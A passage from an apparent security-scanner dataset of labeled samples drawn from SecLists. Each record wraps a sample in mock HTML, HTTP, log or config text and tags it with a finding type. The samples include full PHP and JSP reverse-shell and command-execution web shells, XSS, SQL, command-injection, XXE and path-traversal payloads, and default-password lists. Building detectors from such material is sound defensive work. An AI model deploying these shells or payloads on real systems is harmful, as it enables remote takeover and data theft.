'10.2.2.1';\n//$ip = '10.2.2.1'; // CHANGE THIS\n//$port = 8888; // CHANGE THIS\n$port = isset($_POST['port']) ? $_POST['port'] : '8888';\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies. Worth a try...\nif (function_exists('pcntl_fork')) {\n\t// Fork and have the parent process exit\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\n\t// Make the current process a session leader\n\t// Will only succeed if we forked\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\npri", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "php-reverse-shell.php"}}]} {"id": "seclists_01489", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)>", "injection_type": "XSS"}}]} {"id": "seclists_01490", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=& HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&", "injection_type": "SQL"}}]} {"id": "seclists_01491", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_01492", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<figure onmouseup=\"alert(1)\">test</figure>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<figure onmouseup=\"alert(1)\">test</figure>", "injection_type": "XSS"}}]} {"id": "seclists_01493", "source": "seclists", "source_license": "MIT", "text": "filename=-", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-", "injection_type": "cmd"}}]} {"id": "seclists_01494", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_01495", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><col ondblclick=\"alert(1)\">test</col></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col ondblclick=\"alert(1)\">test</col>", "injection_type": "XSS"}}]} {"id": "seclists_01496", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/%00/ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%00/", "injection_type": "cmd"}}]} {"id": "seclists_01497", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf |echo%20VEMEGX$((63%2B29))$(echo%20VEMEGX)VEMEGX&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo%20VEMEGX$((63%2B29))$(echo%20VEMEGX)VEMEGX&", "injection_type": "cmd"}}]} {"id": "seclists_01498", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><ol onmouseleave=\"alert(1)\">test</ol></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ol onmouseleave=\"alert(1)\">test</ol>", "injection_type": "XSS"}}]} {"id": "seclists_01499", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=XXXXX`perl -e 'print \".%p\" x 80'` HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "XXXXX`perl -e 'print \".%p\" x 80'`", "injection_type": "cmd"}}]} {"id": "seclists_01500", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf `", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`", "injection_type": "cmd"}}]} {"id": "seclists_01501", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01502", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Super short XSS variant 2 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Super short XSS variant 2", "injection_type": "XSS"}}]} {"id": "seclists_01503", "source": "seclists", "source_license": "MIT", "text": "filename=%22|echo%20ZSRBDN$((11%2B21))$(echo%20ZSRBDN)ZSRBDN'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22|echo%20ZSRBDN$((11%2B21))$(echo%20ZSRBDN)ZSRBDN'", "injection_type": "cmd"}}]} {"id": "seclists_01504", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG LOWSRC=\"javascript:alert('XSS')\"> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG LOWSRC=\"javascript:alert('XSS')\">", "injection_type": "cmd"}}]} {"id": "seclists_01505", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '><script>alert(document.cookie)</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'><script>alert(document.cookie)</script>", "injection_type": "cmd"}}]} {"id": "seclists_01506", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ''%20or%201=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20or%201=1", "injection_type": "SQL"}}]} {"id": "seclists_01507", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=JavaScript concatenation vector variant 2 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript concatenation vector variant 2", "injection_type": "XSS"}}]} {"id": "seclists_01508", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#x003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x003C;", "injection_type": "cmd"}}]} {"id": "seclists_01509", "source": "seclists", "source_license": "MIT", "text": "filename=${exec(print(`echo%20JFZDGZ`.`echo%20$((16%2B38))`.`echo%20JFZDGZ`.`echo%20JFZDGZ`)%3B%5C%5CJFZDGZ", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${exec(print(`echo%20JFZDGZ`.`echo%20$((16%2B38))`.`echo%20JFZDGZ`.`echo%20JFZDGZ`)%3B%5C%5CJFZDGZ", "injection_type": "cmd"}}]} {"id": "seclists_01510", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", "injection_type": "XXE"}}]} {"id": "seclists_01511", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<datalist onmouseleave=\"alert(1)\">test</datalist>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<datalist onmouseleave=\"alert(1)\">test</datalist>", "injection_type": "XSS"}}]} {"id": "seclists_01512", "source": "seclists", "source_license": "MIT", "text": "username=' or (EXISTS)&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or (EXISTS)", "injection_type": "SQL"}}]} {"id": "seclists_01513", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or ''&'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''&'", "injection_type": "SQL"}}]} {"id": "seclists_01514", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:BECU,musi1921,Musii%1921,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "BECU,musi1921,Musii%1921,"}}]} {"id": "seclists_01515", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"></script></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "</script>", "injection_type": "XSS"}}]} {"id": "seclists_01516", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin\" or \"1\"=\"1\"--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or \"1\"=\"1\"--", "injection_type": "SQL"}}]} {"id": "seclists_01517", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = '*'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'*'", "injection_type": "SQL"}}]} {"id": "seclists_01518", "source": "seclists", "source_license": "MIT", "text": "filename=\" or \"a\"=\"a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"a\"=\"a", "injection_type": "cmd"}}]} {"id": "seclists_01519", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01520", "source": "seclists", "source_license": "MIT", "text": "password: tracer\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tracer"}}]} {"id": "seclists_01521", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>URL breaker for single quotes</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "URL breaker for single quotes", "injection_type": "XSS"}}]} {"id": "seclists_01522", "source": "seclists", "source_license": "MIT", "text": "// backdoor.jsp\n// http://www.security.org.sg/code/jspreverse.html\n\n<%@\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\n% >\n<%!\nstatic class StreamConnector extends Thread\n{\n InputStream is;\n OutputStream os;\n\n StreamConnector(InputStream is, OutputStream os)\n {\n this.is = is;\n this.os = os;\n }\n\n public void run()\n {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n\n try\n {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n\n char buffer[] = new char[8192];\n int lenRead;\n\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\n {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n }\n catch (Exception ioe)\n\n try\n {\n if(isr != null) isr.close();\n if(osw != null) osw.close();\n }\n catch (Exception ioe)\n }\n}\n%>\n\n<h1>JSP Backdoor Reverse Shell</h1>\n\n<form method=\"post\">\nIP Address\n<input type=\"text\" name=\"ipaddress\" size=30>\nPort\n<input type=\"text\" name=\"port\" size=10>\n<input type=\"submit\" name=\"Connect\" value=\"Connect\">\n</form>\n<p>\n<hr>\n\n<%\nString ipAddress = request.getParameter(\"ipaddress\");\nString ipPort = request.getParameter(\"port\");\n\nif(ipAddress != null && ipPort != null)\n{\n Socket sock = null;\n try\n {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n\n Runtime rt = Runtime.getRuntime();\n Process proc = rt.exec(\"cmd.exe\");\n\n StreamConnector outputConnector =\n new StreamConnector(proc.getInputStream(),\n sock.getOutputStream());\n\n StreamConnector inputConnector =\n new StreamConnector(sock.getInputStream(),\n proc.getOutputStream());\n\n outputConnector.start();\n inputConnector.start();\n }\n catch(Exception e) \n}\n%>\n\n<!-- http://michaeldaw.org 2006 -->\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "jsp", "filename": "reverse.jsp"}}]} {"id": "seclists_01523", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26echo$IFSHYWHUO$((82%2B84))$(echo$IFSHYWHUO)HYWHUO'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo$IFSHYWHUO$((82%2B84))$(echo$IFSHYWHUO)HYWHUO'", "injection_type": "cmd"}}]} {"id": "seclists_01524", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=%2A%28%7C%28mail%3D%2A%29%29 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28mail%3D%2A%29%29", "injection_type": "SQL"}}]} {"id": "seclists_01525", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Removing Cnames HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Removing Cnames", "injection_type": "XSS"}}]} {"id": "seclists_01526", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=IE backticked semicolon injection HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IE backticked semicolon injection", "injection_type": "XSS"}}]} {"id": "seclists_01527", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><samp onmouseover=\"alert(1)\">test</samp></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<samp onmouseover=\"alert(1)\">test</samp>", "injection_type": "XSS"}}]} {"id": "seclists_01528", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Malformed IMG Tags\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Malformed IMG Tags", "injection_type": "XSS"}}]} {"id": "seclists_01529", "source": "seclists", "source_license": "MIT", "text": "filename=%20$(sleep%2050)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20$(sleep%2050)", "injection_type": "cmd"}}]} {"id": "seclists_01530", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=1a2b3c\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1a2b3c"}}]} {"id": "seclists_01531", "source": "seclists", "source_license": "MIT", "text": "username=declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)", "injection_type": "SQL"}}]} {"id": "seclists_01532", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:fingerig@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "fingerig"}}]} {"id": "seclists_01533", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Novell,LASER,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,LASER,<BLANK>,"}}]} {"id": "seclists_01534", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2522%7C%20%5B%203%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%203%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_01535", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%20echo%20UHJUHS$((68%2B93))$(echo%20UHJUHS)UHJUHS%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20echo%20UHJUHS$((68%2B93))$(echo%20UHJUHS)UHJUHS%7C", "injection_type": "cmd"}}]} {"id": "seclists_01536", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#x0003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x0003c", "injection_type": "cmd"}}]} {"id": "seclists_01537", "source": "seclists", "source_license": "MIT", "text": "filename=65536", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "65536", "injection_type": "cmd"}}]} {"id": "seclists_01538", "source": "seclists", "source_license": "MIT", "text": "filename=%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G", "injection_type": "cmd"}}]} {"id": "seclists_01539", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01540", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=@&apos; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@&apos;", "injection_type": "cmd"}}]} {"id": "seclists_01541", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]>", "injection_type": "XXE"}}]} {"id": "seclists_01542", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin' or 1=1# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or 1=1#", "injection_type": "SQL"}}]} {"id": "seclists_01543", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><script onclick=\"alert(1)\">test</script></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script onclick=\"alert(1)\">test</script>", "injection_type": "XSS"}}]} {"id": "seclists_01544", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<content onclick=\"alert(1)\">test</content>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<content onclick=\"alert(1)\">test</content>", "injection_type": "XSS"}}]} {"id": "seclists_01545", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JSQHHO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01546", "source": "seclists", "source_license": "MIT", "text": "filename=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_01547", "source": "seclists", "source_license": "MIT", "text": "filename=..%25%35%63", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%25%35%63", "injection_type": "cmd"}}]} {"id": "seclists_01548", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &echo%20UDYYJG$((66%2B1))$(echo%20UDYYJG)UDYYJG'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&echo%20UDYYJG$((66%2B1))$(echo%20UDYYJG)UDYYJG'", "injection_type": "cmd"}}]} {"id": "seclists_01549", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\u00e2\u0080\u0098 or 3=3 --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u00e2\u0080\u0098 or 3=3 --", "injection_type": "SQL"}}]} {"id": "seclists_01550", "source": "seclists", "source_license": "MIT", "text": "<?php\n\n/*\n * Dysco(Dynamic PHP Shell Command for RCE)\n * Created by Petruknisme @2020\n * Contact: me@petruknisme.com\n */\n\n\nfunction Dysco($command)\n{\n $list_function_shell = array(\"system\", \"exec\", \"shell_exec\", \"passthru\", \"eval\");\n $f_enabled = array_filter($list_function_shell, 'function_exists');\n \n echo \"Enabled Function:\\n<br/>\";\n foreach($f_enabled as $f)\n {\n echo $f.\" \";\n }\n\n if($f_enabled !== \"\"){\n $f = $f_enabled[0];\n echo \"<br/>\\nUsing \". $f. \" as shell command\\n<br/>\";\n \n if($f == \"system\" || $f == \"passthru\"){\n // disable multiple output for system\n ob_start();\n $output = $f($command, $status);\n ob_clean(); \n }\n else if($f == \"exec\"){\n $f($command, $output, $status);\n $output = implode(\"n\", $output);\n }\n else if($f == \"shell_exec\"){\n $output = $f($command);\n }\n else{\n $output = \"Command execution not possible. All supported function is disabled.\";\n $status = 1;\n }\n \n }\n\t\n return array('output' => $output , 'status' => $status);\n}\n\n// for HTTP GET use this.\n\nif(isset($_GET['cmd'])){\n $o = Dysco($_GET['cmd']);\n echo $o['output'];\n}\n\n// for debugging in local, use this\n\n//$o = shell_spawn('uname -a');\n//echo $o['output'];\n?>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "Dysco.php"}}]} {"id": "seclists_01551", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: This vector creates an UXSS via firefoxurl: HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector creates an UXSS via firefoxurl:", "injection_type": "XSS"}}]} {"id": "seclists_01552", "source": "seclists", "source_license": "MIT", "text": "GET /search?q='-alert(1)// HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'-alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_01553", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:SpeedStream,Administrator,admin,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SpeedStream,Administrator,admin,"}}]} {"id": "seclists_01554", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=$context.keys HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$context.keys", "injection_type": "SSTI"}}]} {"id": "seclists_01555", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=' or user like '% HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or user like '%", "injection_type": "SQL"}}]} {"id": "seclists_01556", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2527%7C%20%5B%207%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%207%20-ne%20%24%28echo%20OYYPMX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01557", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><rb id=x tabindex=1 onfocusin=alert(1)></rb></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rb id=x tabindex=1 onfocusin=alert(1)></rb>", "injection_type": "XSS"}}]} {"id": "seclists_01558", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><q oncopy=\"alert(1)\" contenteditable>test</q></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<q oncopy=\"alert(1)\" 